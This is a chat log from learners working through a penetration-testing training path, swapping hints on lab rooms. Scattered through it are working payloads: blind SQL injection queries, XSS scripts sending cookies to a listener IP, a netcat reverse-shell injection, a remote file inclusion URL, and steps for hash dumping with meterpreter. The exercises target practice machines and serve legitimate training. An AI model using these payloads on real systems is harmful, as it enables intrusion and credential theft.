#junior-pentester-path
i will never give the flag for this room cause it sucks and everyone should do it lol
ah come on...
reload
my head is already reeling from even just looking at windows stuff ;-;
@rough ore are u still stuck?
dm me
try F instead of f
anyone here finished the LFI room ?
on the service name
I'm doing task 8 with 2 other friends right now and nothing we try is working
maybe your method is wrong
oh sorry i get the version but from control panel
open control panel ..you will get it
Gave +1 Rep to @fallen crater
maybe because it is a trivial solution
anyone else having issues with the final XSS challenge? Site not loading for me
yw
i think reloading helps
cant find it lol what would u name it ?
something .exe
freefortnitebucks2021.exe
think about what would make sense... how the unquoted path exploit works
basically it'd be part of the path name
I always wonder what's Advanced
its just beyond
that would be very handholdy
it sounds so obvious.. it is making me doubt myself
Basically maybe reread the instructions again, try to understand what it means to exploit unquoted service path
just think of this example:
if the service runs under: C:\Hello\welcome all\service.exe
When the system comes to execute this service it will open C:, but before opening this folder, welcome all,
it will notice that there is a space between the word welcome and the word all. Then, as it is an unquoted path, the system will try to run the executable welcome.exe (which does not exist) in the Hello folder; the system will not find this executable, so it will go to the original service, which is C:\Hello\welcome all\service.exe, and run it.
all you need to do, is to insert your executable somewhere and with a specific name before the system runs the original service..
I got the idea, but my brain just won't see it.. let me reread it one more time
focus on it you will get it
no its ok, it takes a while to figure out
Hi guys, I got stuck in SSRF room Task 2 "SSRF Example". I'm not able to understand how &x= works. I tried using https://website.thm/item/2?server=server.website.thm/flag?&x=id=9 and Server Requesting: https://server.website.thm/flag?&x=id=9.website.thm/api/item?id=2 Can someone describe what happens?
So, in nmap04, it says "run nmap with -O and TARGET_IP", but if I do that, nmap says the host is down and I should use -Pn? Should it not just work without -Pn?
you are nearly there. check the URL at the bottom of that screen. try to make the first part of identical to what you are looking for
reading the explanation on part4 why u add &x= solves the problem, its simple, dont overthink like i did
Hi, I dont get the question on SSRF Task 3:
What website can be used to catch HTTP requests from a server? What website it refers to?
read the last paragraph again
lol, I must be blind..., thanks
Nvm I forgot to connect to the THM VPN 
jsut wanted to say it worked fine for me
I'm stuck on Subdomain Enumeration in the Virtual Hosts section where we use ffuf and FUZZ and the namelist file to try and find subdomains. When I run the command, it runs through all lines of the name list, but each line just says error and gives no info. Anyone else encounter this?
It's like it goes line by line of the namelist and at the end of every entry it says error. Each line says the same thing. I think I'm all connected okay
just tried. I guess not. Request timed out.
So, refresh and try again?
attackbox
that's what I thought.
I'm initializing a different attackbox as we speak, though.
ugh, same exact error. Each line reads:
:: Progress: [150/1907]:: Job [1/1]:: 4 req/sec :: Duration [time] :: Error
i just tried to visit the IP in my browser and it said it couldn't be reached.
it looks like the site is down maybe? acmeitsupport.thm
Did you add it to /etc/hosts?
is there an issue on the THM network?
i don't seem to have any issues
isn't that what the web developer does and we're trying to find names stored there? It successfully is grabbing the namelist and from my files and scanning it.
i cant get the site for the box i just spun up to load i can ping the machine but the site will not load
which site?
i am doing the last task for the XSS room
the address it gives me returns a 504 error
I don't know your command as you haven't posted it
there is no command to post, i am just trying to load the site so i can start
I'm in an attack machine and able to use it... maybe just your end is having an issue. perhaps close out THM and reload?
just about to try that
Yeah, it was addressed at the other user.
my bad
first time it didnt open website for me, next time when i relaunched the machine, it worked fine
in Windows PrivEsc, sc query windefend is not working
ye looks like i had to terminate both the attackbox and the target and restart both that worked
Hey guys i am on the Metasploitintro room and the question
What command would you use to clear a set payload?
I can't seem to find the command, not sure if i have overlooked this. any hints?
Google it
the man page can help
That too
But generally if you don't know an answer your first step should be google
Yeah i had googled it, but nothing was showing that i was looking for
read the help page type: help
type help and read the help page you will figure it out
Glad you figured it out.
@fallen crater NGL i forgot about that help page, cheers
Partially, but the difference between dns/domain names and VHOSTs is incredibly important
If you can't resolve what you're scanning, your system doesn't know where to send the traffic
I can't see your command so I can't tell if that's the case or not.
its written in that room
I'll re-read again
BTW it is an easy name to guess:
you use set to set a variable
you use ..... to unset a variable
both last so long
@fallen crater I thought i tried the easy options let me try them again
try you will get it
Don't post a drive link. If your account is verified then just upload the picture
@fallen crater I had the first one but didn't insert the last bit -,- Thanks haha
Gave +1 Rep to @fallen crater
lol
haha nice what a thing
can someone help me with task 13 burpsuite basic?
what is the problem ?
@fallen crater the pentester role come with the title?
i cannot find that file
yes three tickets and you will get it
Awesome i got the title but not discord yet
It'll update. Just give it a bit
Yeah prob update tomorrow
you can update it manually
@oblique sand go to the thm bot and type that command for update stats
Ahh
by typing !verify <your discord token> to the THM bot
@fallen crater can u help me with task 13 burpsuite basics?
I'll do that cheers
i cannot find the requested file with the flag in site map
i will give it a try now
yes
open all webpages (i.e., home, about, contact, support, product) and let the traffic go through the proxy without intercepting it, then go to (Proxy => HTTP history) in Burp Suite and you will notice a strange file name; see the response and you will get the flag
you didn't open all the pages i think you missed one or more pages like the support page or the product page i think
i opened all the pages
try to go to http history..under the proxy tab
does netsecchallenge take that much time?
Nope, but there is trivial stuff that takes that time, like the syntax for something or some brute force stuff
Hey Everyone, I'm looking at the Linux Privilege Escalation: Path task 10. The example uses gcc to compile the executable to run as part of the exploit. The VM associated with the task doesn't have gcc installed. Is there something I am missing? - Never mind, I'm an idiot and missed what I should have been doing.
yes what is the issue?
for sure
not sure the exact % the filter is set at but I was down to 5% and still failed- not til I got to 0% did I pass that one;)
can i dm u?
ok
good day..apologies for the noob question, but the pentester title obtained in this path, is it temporary?
have you tried -sN
if it was like the last title rewarded from the last ticket give away yes
copy on this sir werlegion, thank you
I think this issue has been finished, hasn't it?
yeah, thanks to you
Gave +1 Rep to @fallen crater
can someone please assist me with the ssrf room task 5 im not understanding how to input the data
are you using dev tools?
i wasnt reading the material enough i think i got it
Hi all, im doing the burp suite hashing portion
Can't seem to get the relevant one that is == to the one given in md5. Tried encode using ascii and base64
can anyone point me in the right direction?
cyberchef
what is the task number ?
task 4
Did you follow the hint instructions ?
yeah.. hash them to md5, then i use encode to base64. Tried ascii hex too
maybe i misunderstood? So i'm lookg for the one that is the same as 3166226048d6ad776370dc105d40d9f8?
yes this is the last question i think, isn't it ?
yup, last of task 4
you have 3 files containing three different values. All you have to do is grab each value, put it in Burp, choose the mentioned hashsum and check the result to see if any result matches this value "3166226048d6ad776370dc105d40d9f8"
note: here you need to look at the hex values
Need a hint ?
hold on
let me try again hahah
I still don't get the same md5
but just trying randomly
look at the hex values
it is next to these random values there are hex values check them, and try to figure it out
the one all the way to the right?
there is a space between each two characters or some spaces from the left to the right like : aa bb n3 dd 88
did you mean that one ?
it is one step one way. just choose the mentioned hashsum
it looks like that
urgh
sorry, dumb qn. how do you insert a screen shot here?
not sure why i can't drag it in here
check your keyboard: there is a key, PrtScr/SysRq, next to F12. Just press it to get a screenshot and choose copy to the clipboard, then just paste it here directly with CTRL+V,
if this didn't work try to install any program
you can save it and upload it
no, it failed to upload
OOOO I GOT IT
ok i have to save
Thanks @fallen crater !!
Gave +1 Rep to @fallen crater
i send u one ss
for that when i am submitting the flag it's showing wrong
even it seems right
@fallen crater
There's no plus sign for mine though
But i do have for other discord chats
wow how u did that one
nice to hear that
was a pain haha
haha keep moving forward
Nopeee
hello, I'm on task 5 of the linprivesc room. I was wondering if someone would be so kind as to help me find a working exploit and how to upload one; it says permission denied every time. When I use find / -perm a=w -user karen -type d 2>/dev/null nothing returns, so where can I write the upload?
out of topic but damn you guys are fast.
Hey, in task 11 of linux priv esc I mounted the NFS share on my attacking machine where I compiled the C program, so I'm supposed to find that file on the target machine in the same directory as the mounted share, but I don't seem to find anything. Anyone got an idea?
On task 8 I can't find the database. I'm stuck enumerating at 'sql_'
Well, what have you tried so far?
a-z A-Z 1-9
Show me your command
admin123' UNION SELECT SLEEP(5),2 where database() like 'sql_M%';--
If I delete the M i'm getting a success
I just can't enumerate anything beyond this
Try again
You're on the right track
You missed something
Oh wait
Actually
The database name isn't just sql
There's more to the first part of the name
Get rid of the _
how do i upload a exploit to the machine if the permissions wont let me in the linprivesc
You missed something
Which task?
Why does it give me a success then? Task 8 Time-based
No idea
Could be that there's more than 1 database
But I'm telling you right now, you missed a letter before the _
task 5
Yep just got sqli_
Yea. Now continue from there
u make a server in ur attacking machine
and use wget to get the exploit file from ur attacking machine to the target
You need to host an http server on your attacking machine
Then use wget from the target to download the file
.. anyone got idea about this
i did that, when i try downloading it says permission denied
Move to /tmp
You likely don't have write perms for the directory you're in
Try rebooting the machine. If that doesn't work I'll need more info
i was able to get the file uploaded but i'm not sure if it is the correct exploit, and if it is, i don't know if the code needs to be altered to work, because i keep getting errors
What errors are you getting?
It's very hard to diagnose errors without seeing the actual error message
i closed the machine been stuck for like three days on that and frustrated to the point i want to put my fist through the wall
Ah rip
check your inbox
Does anyone know about Task 8 of Practical Example (Blind XSS)? Do I have to specify a port from a target website port or netcat one?
You're trying to catch the request, nc port
I know a lot of people had trouble using nc on that room, I ended up having to reload and just use the THM catcher
Ok
I opened it but i have no idea how THM catcher works
I also tried to setup a payload in html
But for some reason it didn't work
It just rolled back
Dont know what did i do wrong tbh
Anyone willing to give some tips on LFI challenge 1 on task 8? I've seen the responses for people stuck and it mentioned changing the method. I've changed the method to POST and given different path names, but it never returns the flag. Any hints?
what are you using to POST the data
I've tried the dev console, under the inspector tab. After I change the method I hit enter and then refresh the page. I've also used Burp and changed it there. Maybe I'm doing it wrong?
try learning how to send POST data with curl; the web fundamentals room is a good place to learn curl
I appreciate the help, but how would curl return a different response than what I see in Burp?
@jolly vine Inspector worked for me, what are you querying?
tbh not sure - im not very good with burp
I'm querying the following:
||POST /challenges/chall1.php?file=../../../../etc/flag1 HTTP/1.1||
When you change the method to POST in dev tools, do you enter the query? I think maybe because you are refreshing the page.
@jolly vine Where is that being inputted?
Well now I get an error so yay! My dev console was over the errors and so I never saw them. You were right though, I shouldn't have been refreshing the page lol
That was originally being input into Burp, but now working out of the Dev console I finally got an error, so that's better than nothing!
You don't need burp for that challenge also
Ohh haha. It's always the simplest thing. Glad you got it working.
Thanks @gloomy crescent
Gave +1 Rep to @gloomy crescent
Thanks @opal stirrup !
You got it now? Congrats!
I am still stuck and confused
Can anyone help me with this task 8 challege ?
challenge *
File Inclusion
Which one?
can anybody tell me how to do task 5 of command injection

i need help with burp intruder task 11...its giving me error abt invalid number settings
Hi everyone, in windows privesc room, dll task, I can't make it work :
Launch room
From open VPN kali
Build dll as instructed + code from hint to change Jack user pwd
Wget dll
Put dll into temp
Open cmd, type commands (the service isn't started, so only start worked)
Go to jack directory
Windows ask login
Type pwd put into dll
Not working...
I tried to restart the box several times
I tried to re stop and start the service, but sys won't let me stop dllsvc
whats your dll name
Nevermind, found it, I changed the password of Administrator instead of jack, and it worked
Hi, I literally know nothing about hacking but I'm willing to learn because it sounds fun, I really need someone to teach me how to hack and what web to use aka step by step and I will be thankful.
yeh following the pathways might help u abit
Hey Hi, just wondering if anyone can help me in SQL INJECTION task 8 Blind SQLi - Time Based
so i've got table schema and table name
now i'm trying to find out the username
is that correct?
if anyone can type in pvt please
better find the column names before that
On the XSS room, the final task. I already captured the cookie using netcat and the THM catcher and decoded it, but when i paste the answer it's saying i got the wrong answer. I don't know if i'm still doing the right thing tho lol
had to grab the cookie with another script apart from the one shown in the procedure
got it,thank you~
Can someone let me know if it is normal that the hydra brute force lasts longer than 30 mins for the Net Sec Challenge for the question "We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?"
30 min no
the brute force should take a minute or 2, its really quick
did u use the right user txt file, paths, ip and port?
Can I get help with SQLi task 8
Can I ping my command to any of you for a check?
||admin123' UNION SELECT SLEEP(5),2 where database() like 'sqli_four and WHERE table_schema like 'a%';-- || got this for sqli task 8, but no matter what i do for table_schema it doesn't find anything
Try scripting your way from the command line... automation is everything
and, for reference, the previous task shows you the commands, you just have to add the "SLEEP()" in the middle
Nmap Advanced Port Scans
ye got it working
can somebody help me with the task 5
turns out i misspelled something when i changed the sql
I have a question about, ||"Make sure you leave the two blank lines at the bottom of the request!"|| why is this a necessity?
Additionally, is there a list for weird request headers which can be used for testing stuff (as stated in Task 5 of Burp Suite: Repeater) or stuff like that can be random ?
You still stuck?
I got this now ||admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'analytics_%';--||
Can't find the next letter or number for it tho
Right path but wrong table lol
wait what
there's more than just one table
but there are at least another one
Yeah you can get the names of the tables and then tag them onto the end of ur command so u can search for another.
Right path
Enumerating wrong table
well, you should step back if this is not the table you need, begin again from "a%', change it to 'b%', 'c%'...
eventually you will find the table you need. Some people have automated this
time to figure out how to automate it
Also can i get a nudge onto the right table if the one im in is incorrect
wait is the table i need start with ||users||?
the example is pretty similar to the previous one, so the idea is the same, find username and password by guessing one by one the characters. So, you may suppose the table name. Another helpful topic if you do it manually: How would you check that this is table name and no character left? Build this query from the one you have now
Man what's up with the tickets always being the same, after 8 rooms all the same
SQLi is a pain, itll be faster learning to automate it
yes, but to automate a thing you should first know how it works
So users I believe is the full name of the table
makes sense
not technical question: I have received one Throwback voucher. In case I get three of them, what are they for?
anyone has done https://tryhackme.com/room/metasploitexploitation room
I am still on the burp room, maybe tomorrow I'll reach it
./file_name.elf
make sure u have +x permission
i don't understand, i am not getting a reverse shell
i have tried x86 as well as x64 payload
thanks
Gave +1 Rep to @wild sundial
u put the correct ip and port as well as listening to it??
need help on task 12 linux priv escalation
yes, which payload should i use ?
i think i need to exploit the suid binary, but i'm stuck
iirc its already described in the procedure which is linux x86 meterpreter reverse tcp
thats not working
I'm running the command with -L user.txt where both usernames are in
did u set the payload while inside multi handler?
yes i just did that.
i was messing up with payload
instead of linux/x86/meterpreter/rev_tcp i was using linux/x86/meterpreter_rev_tcp
i'll try kernel exploitation
glad that u find out
I need someone to eyeball my cookie fetch script for Task 8 of XSS. I am not getting any response on my listener. </textarea><script>fetch('http://10.13.26.99:4455?cookie=' + btoa(document.cookie) );</script> I fear it is something very basic, but I am not sure. I also don't know how to black anything out like a hint.
did you set a listener?
what is your host IP on VPN?
VPN is the 10.13.26.99
I can ping both the machine and the VPN
yes, it is the port I normally practice with.
I'm not getting a reverse shell while exploiting cronjobs in Linux PrivEsc. Am I doing something wrong?
not sure if second slash is needed, between port and ?cookie
I was just going by the way it was written. I will check
try with <script type="text/javascript">document.location="http://IP:Port/?c="+document.cookie;</script>
I had to use Chmod. Totally didn't see the permissions. Thank you @modest arch
Gave +1 Rep to @tulip elm
I'm trying to use the EternalBlue exploit for https://tryhackme.com/room/metasploitexploitation and msf keeps saying: [-] 10.10.58.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.10.58.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.10.58.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Still waiting to see if I get any response. Still nothing on the listener.
Guys, hello, in Burpsuite:Repeater
In the practical challenge, it says to change the number at the end of the request to extreme inputs
What is considered an extreme input
or very low
yeah
try negative
Im putting like this
like what
lower than 0...
-69

anyone know?
I see it
cant u just use the module?
I had to keep trying the exploit, it finally took
Why do i keep getting already gotten tickets, it's been like that 7 rooms in a row
Why
Who programmed this
"use exploit/windows/smb/ms17_010_eternalblue"
I am
Hi team....just wanted to check...any idea what is this pentester title in this path...i mean once we have redeemed it, what happens?
You get a title next to your name
thanku brother
Sooo the number of 3 months voucher decreases? Cmonnn mannn
I need to be quick to get something? Not fair
Wow
Same man
It sucks
Im busting my ass here
I definitely learned alot, but like damn would be nice to get a good reward
How long does it take to finish?
I'm still on task 3
Sorry I mean room 3 task 3 of jpp
I need help on authentication bypass task 3, trying to brute force but getting a error in terminal
sure, what point are you?
Now I'm getting this error...
[-] 10.10.58.136:445 - Rex::ConnectionTimeout: The connection with (10.10.58.136:445) timed out.
[*] 10.10.58.136:445 - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.58.136:445 - The target is not vulnerable.
target
I am not able to find flag2 in last task
yes, but, where are you stuck?
I changed cookie value from Guest to admin in burp, then I see Welcome to admin page, get your flag
yeah
ok, play with this cookie value a little more, change it, idk, maybe to test
and see what happens
Hello, just a quick question. What do they mean by "reverse dns"?
ip->name instead of name->IP
weird. not getting reverse shell in crontab task. i also gave +x perm to the sh file, wrote exactly as what the task described.
Linux Privesc, Task 10 : I guess i'm unable to understand the process. Can anybody help!
It is showing error failed opening 'includes/test.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php')
now you have a hint on what shows depending on what you enter on the cookie
no
merci beacoup!
if you enter admin, what is shown on the page? If you enter a not valid thing, it shows you an error with some interesting data: From where it includes the data. From here, you can test and play with the cookie
lmao terminating machine solved
what was the issue?
not getting reverse shell back
but, the cause, if you have all well configured on the cron tab abuse
tried itbut didnt work
have the same issue
anybody tried to get a shell on the Command Injection machine? I made sure the outbound port wasn't blocked using telnet, I've checked in the bin directory to make sure the binaries I wanted were there. First I tried some bash payloads but the & gets truncated (since it's used for query string parameters I guess), I've also used this nc payload ||;/bin/nc -e /bin/sh (tun0 IP) 1234 (replacing space with url encoding %20)||.
For listener I used ||nc -l -p 1234 -vvv||, anything else I could have tried?
ummm! anybody?
ah okAY!
all you have to do is replace the file with the rev shell code with the correct ip and port, give exec permission and listen to it.
worked for me after terminating and restarting the process.
anyone know why this errors ||https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name='users' and COLUMN_NAME like 'a%';--|| for task 8
put admin not admin123
Still getting the same error
saying collumn_name not found but thats what I'm trying to find
as the same thing works for task7
then change 'a%' to 'b%'...
been trying that
I made at least one similar mistake yesterday. I'll give you a hint first. On Task 7, check this and previous step. the query you send has a difference apart from the new COLUMN_NAME part, check it
Is this why the metasploit eternalblue exploit isn't working?
thanks
Gave +1 Rep to @red wraith
turned out I didn't change a tiny bit
shouldn't matter but if that exploit fails once, you need to restart the target machine
Oh, I see
that exploit is real finicky
Thank you
Gave +1 Rep to @visual crest
managed to get the flag, thanks alot for all your help :)
Gave +1 Rep to @red wraith
you're welcome, as I said, had the same issue. Lesson re-learned: check all the commands twice
yep
I've done this 5 times now and it's still not working
have u set all required options?
Yes
Room File Inclusion challenge last task... Can anyone help me finish
can you screenshot your options?
Sure, gimme a sec
it ran on the first time for me and I felt like I won a prize
you have to tell us your issue
you can use file inclusion to make the server request a file from you
yes i did this
Blurred my IP, but here you go: https://streamable.com/mk5747
so verify if the file requested from you is correct
linux priv esc. task 2 What Linux is this?
how to find that i just know that it's ubuntu
cat /etc/os-release
Gave +1 Rep to @iron vale
Thanks
I'll try that
and your LHOST is your 10.x IP?
Well. Because it's WSL2, it's the IP of that
I tried with the IP of my windows PC with WSL2 on it, and it said it couldn't bind to the IP I gave
yes
I've never had to do that before for any of the other rooms, but sure
you should be doing your VPN within Kali/attack machine but also like Neo said, if you have SMBUser/Pass, you should fill that in
(honestly for security reasons, not that I don't trust people who use THM - aspiring hackers, I'd never VPN from my host machine)
I thought you meant on my Windows PC, which, like I said, has worked for all the other rooms
Running and running within WSL are two different things
how to complete task 5 of linux priv esc
i am unable to find an exploit
the flag is in front of me, but i don't have permission to display it
also you are using a staged exploit when the example screenshot is not
I have no idea what that means
you are using meterpreter/reverse_tcp instead of meterpreter_reverse_tcp
Oh
you identified kernel version, looked for exploits but couldn't find a kernel exploit?
i got but it contains errors
it's in C programming lang.
yeah you compile it with cc
gcc man
thanks a lot i got it and i will never forget this info
Gave +1 Rep to @steel ice
not cc
on the system
miracle ❤️
They're both c compilers, it doesn't matter which you use. Gcc is Gnu CC
not a man... but you are the one getting compile errors
ohhh
leave it, tell me what to di
do
excuse you?
further so that i can get escalated
i mean close that topic and help me
How do I use that instead?
Oh
It worked
well you are the one not saying what errors you are getting, where you are compiling it, etc
yay!!
Thanks @visual crest @modest arch
Gave +1 Rep to @visual crest
yeah its the silly little things
see, i took 2 files from the internet, both the codes were different but i think their work is the same, i took them from exploit-db
and me not really knowing what I'm doing
Matching the payload with what you've generated and what metasploit is listening for is crucial
one code is throwing 2 errors while the other is throwing multiple errors
Errors or warnings?
!docs verify
If you follow those steps, you can post a screenshot for Zojja. Will make it much easier to help.
yes warning
you could provide screenshot, also verify that you are compiling on the system you are trying to compile on
ok
yes u r right, both the programs are throwing warnings, not errors
mount failed..
couldn't create suid
the output
I've been trying the whole night and this morning on task 11 of linux priv esc. It's simple: i just mount a share on my local machine, then make my exploit there, and i'm supposed to find it shared in the directory on the target machine, but whenever i check the target machine nothing was created. Anyone faced this? It's really annoying
the second code is showing this output:
spawning threads
mount #1
no FS_USERNS_MOUNT for overlayfs on this kernel
child threads done
exploit failed
again, you need to share more details: what kernel does the system have, what exploit did you find
ok
is it me or is network security hard..
network sec. module is easy
damn senpai
so you mount the share on your system, then you put whatever you put in that directory, check target system and the file is not there? what share are you mounting on your own system?
like everything, it takes practice
pretty hard to comprehend the icmp portion :/
in the task there are 3 available shares, of which 2 can be accessed for reading on the target machine
i tried with all
each time but no chance
the code i am using -> https://www.exploit-db.com/exploits/37292
can you do some screenshot of your steps or outline? if you try to mount, put file there and file still doesn't exist, then something failed with your mount
@visual crest
This is for Ubuntu... is the system Ubuntu?
that's what i'm thinking about, yet the mount command outputs no error
don't make me boot up this system...
I don't remember the kernel exploit being Ubuntu
i am really stuck
yup, i created a directory, mounted it to a share and then created the file in that directory which i mounted with the share
can you show a screenshot of the info you found where you determined it was Ubuntu?
can you show a screenshot of this?
I'm trying to exploit the system, I didn't copy the exploit to my system so I dont remember which one I used
ok just validated, that exploit you linked is the right one and works perfectly
Kernel exploit
well on the target system, you don't have access to /home/ubuntu do you?
i don't have access to /home/backup but i do to the other 2 directories
i tried even with /tmp same thing
you need to use the mount that is /tmp (or in tmp? I don't remember)
i think i can mount on any of the shares i can read and that make no difference
i feel the mistake is somewhere in mount command but it's not outputting any error
try tmp
humor us
yeah I think all of them do but you can only access 1 of them on the target system
yes
all 3 of them do
there is actually a question about that and i did answer it
also same
i would reboot
might want to just restart from scratch, try it again, use /tmp
actually
lol
when i logged again in target machine
i could see all file being shared
even in the other directory
guess it had to be refreshed or something
thanks for help)
no prob
my terminal freezes whenever i do the NFS privesc
is it a network issue?
btw, i use virtualbox as 2GB ram
Heho, i need help with "Authentication Bypass" Task 3 "Brute Force" :/ I tried it exactly as described, then with Burp, then with a bigger wordlist (rockyou) and so on. I always only get back the 200 status code. It just doesn't find any working combination
you use the usernames you found in task 2?
it shouldn't be your virtualbox... maybe try the attack box?
i tried both kali vm and attack box, and i used the result from the task before. it is working because i see it at the result of tries (always x4).
ah yes! true
Yeah, it should be so simple :/
and you create a file called valid_usernames.txt that is the usernames from task 3? and do the command exactly as typed?
It is the exact command executed within the Attackbox. All 400 combinations are tried and it only finds 200 status codes
sorry attackbox was for einst3in
@visual crest is CISSP too hard?
It was still a valid hint ^^
not too hard
I'm probably goin for something tough after oscp
can you screenshot your command and usernames? also validate no spaces in your username file ?
I will have some rest after oscp
how can i insert images? i only get errors when i try it ^^
Are your prepared?
oh you aren't verified
!docs verify
to rest? yes. For OSCP, I finished lab time yesterday, I have a month to the exam. Will prepare BoF next 2 weeks, and do some machines on my own. I think that I should be prepared, but we'll see
whoa whoa! That sounds amazing. Would you like to get me some tips? I'm kinda beginner
well, I think that there are plenty of people here with more expertise than me. If you are a beginner and can not dedicate much time, go to the new learn options or at least three months of lab. I have done and documented exercises to get some extra points on the exam, and to have some review/idea, followed a lot of reddit r/oscp ... There you may find some good resources and indications such as TJ Null's list of machines to do before the exam
Ok, i found my error. The correct hint was that there should be no spaces in the username file. I piped the output of the first task into the file, because i thought that this is a special format which "ffuf" can work with ... But it seems like you have to create your own file with the names you found ^^
awesome
Thanks ^^
Gave +1 Rep to @visual crest
Oh ! okay!
there are plenty of blogs and what not on how to prep for OSCP
I did eJPT last year, and another one quite similar, not famous, a Spanish one, and keep feeling a total beginner
need help on linux priv esc task 12, what vulnerability can i exploit?
what have you found?
PATH, SUID, sudo, cronjobs, nfs didn't work
i don't know if i need a horizontal move to become missy
base64 to get the missy's ssh?
how can i solve "mount.nfs: Protocol not supported" whenever i mount
nfs taking too long 
did you try it?
can you post a screenshot?
sure
why vers=2?
try this mount 10.10.0.243:/tmp /tmp/share
ahh imma try it again
thanks both of u
can i dm you?
i was like, damn! he must be a professional in using NFS. And that's the reason he's using other flags 
well sure but can you try the exact command given?
before DMing
ah I wanted to make it more complicated so that I could read the shadow file directly, thank you for your goodwill
Gave +1 Rep to @visual crest
Linux Privesc Task 11 NFS. Unable to see the created file in the mount
I just created a file in my share, but can't see the file in the victim's shared folder
it can take a few seconds but also share the command you used
mount -o rw 10.10.226.13:/home/ubuntu/sharedfolder /home/root/bakuphere
do you have access to /home/ubuntu/sharedfolder on the target system?
yes
you do?
I mean if you are on target system and cd to /home/ubuntu/sharedfolder and type 'pwd', what do you get?
yes
yeah i can access
ok weird...
wait... do ls -ld . on the /home/ubuntu/sharedfolder
'ls -ld .'
or ls -ld /home/ubuntu/sharedfolder
ok weird I am gonna try this
can you try to use /tmp instead of /home/ubuntu/sharedfolder
yeah! my terminal was just frozen, that's the reason i switched to sharedfolder lol
wait still! lemme do it again
because I swore when I did this, I couldn't get to that directory at all but you can and you can read it
lol that sounds weird
yes
still!
can't see the file
lol
ok show a screenshot again?
I mean that looks all ok
reboot your own system too
i don't think i should do that
else i'll lose access to attackbox. It's around an hour now. I'll lose access if i restart again
you found a mistake?
go on
makes sense
hey in File inclusion when i upload from my apache server it gives my own shell.
How can i get victim's shell????
did you win it?
No
tryin...my system is damn slow
no! i didn't ! i have an Intel Pentium
loll! i think you were right! But i remember i actually did the same as u said before but no change.
idk how it worked now!
No idea what's happening with me and my system
haha ! lol
Is this correct ?
/playground.php?file=http://<kali_ip>/shell.php
I'm stuck on this question of the metasploit: exploitation room
I don't know how to do that
The hint doesn't help me
did u extract the passwd?
I don't know how to do that
I tried running that command in the reverse shell and it said not recognised as an internal or external command
I don't have a meterpreter prompt
I just have a reverse windows shell
if i remember, we need to get the windows shell and then convert it to a meterpreter then execute hashdump to get the hashes and pickup pirate's hash and crack it using john
Ctrl Z the process. Then you get back to your meterpreter shell and then
search shell_to_meterpreter
use the module
show options
set all the required options, also set the session 1. As u just made the win shell background
run
you'll now get a meterpreter shell
now :
execute hashdump to get the hashes
copy pirate's hash
go to your local machine and crack the hash . keep the --format=NT
Ping me if you still get any issue!
Thanks
Gave +1 Rep to @north dove
wait lemme see !
can u give me 10 minutes? lol ! i was goin to make a subscription.
After i saw your message i thought to do yours first ! but unfortunately burp intruder room requires subscription 
okay take your time np
Anyone else did this?
yeah I positioned it next to the GET request i mean the URL/tickets/$number$
lol! my account is empty
wait lemme see if i can help anyway
how do I know if it's MY cookie
yeah please
what's the question?
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
i am not allowed to run sudo
and gcc is not installed, nor can i install it
ok ok.
yeah!
got it
I gave it above
u mean number 1-100?
click the length
can anyone help with file inclusion task 4? im stuck on the first question
yeah
show it here
lol! coz that's what heroes do
I wish i could help! But i'm no more a subscriber
what should i write in answer if no os is detected in Nmap Post Port Scans?
Hey guys i am on Metasploitexploitation room.
I am currently on task 5
What is the NTLM hash of the password of the user "pirate"?
I have the hashdump of the password but not sure how to get the NTLM hash.
Done some digging but nothing so far
Someone point me in the right direction
this correct?
@steel nymph I've done some digging but a lot of info online is forwarding me onto tcp reverse exploit. But not sure that is correct
https://openwall.info/wiki/john/hash-formats this documents the format that meterpreter's hashdump command outputs
@idle bison cheers
More specifically, it's the pwdump format there.
That bit of documentation is annoyingly difficult to find sometimes
so how do I bring the cookie here
task11
You can also add it, it's the Cookie: stuffHere header
Find an authenticated request and copy the header
@idle bison Thanks i worked it out
Gave +1 Rep to @idle bison
A LOT of Windows tools will spit out pwdump format so it's worth knowing a little about
i am confused, LD_PRELOAD isn't there anywhere when i type sudo -l, instead there is a mail_badpass
should i set sudo mail_badpass=/home/user/ldpreload/shell.so find
instead of sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
sudo -l
Matching Defaults entries for karen on ip-10-10-23-155:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User karen may run the following commands on ip-10-10-23-155:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano
this is the output of sudo -l
i am in /tmp
If I remember correctly there is a link in the exercise to https://gtfobins.github.io/ that shows how to exploit those binaries
ok
What can i use that will get me the flag in File Inclusion challenge 3? I can't find the filter bypass
Can anyone give me a hint for File Inclusion, Task 8, Challenge 3?
The one that filters the input.
Which task?
mix of challenge 1 and 2
Same for me... If I open the ticket I get the http request from me but never from the staff...
edit: I've done it with the listener they provided and by putting http:// before their link
6
it's https://tryhackme.com/room/linprivesc task 6
Hey, you're a different person
I was just posting it in #room-bugs
yes, I have the same issue and I was stuck
env_keep is not available right?
On some systems, you may see the LD_PRELOAD environment option. Looks like it's telling you about it but doesn't expect you to do it?
correct, need to abuse one of the binaries from sudo -l
can i dm you
sure
@loud spire @tall siren I agree it's confusing, it'd be good for them to add a vulnerable config so you can practice as they do in the video.
so should i skip that task for now ?
No, not skip. You aren't meant to use ld_preload. You need to abuse the binaries that you have permissions to execute.
ok
Found the flag thanks to @steel nymph @modest arch @idle bison @north dove
Gave +1 Rep to @steel nymph
so sad only lassi got repo
I think i am making a mistake in XSS lab last task
can somebody help me with the gig?
yeah that is the issue
Hey if someone wants to hack with me on the junior pentester path let me know
I'm on authentication bypass
there is an entire room #junior-pentester-path
I'm in the room
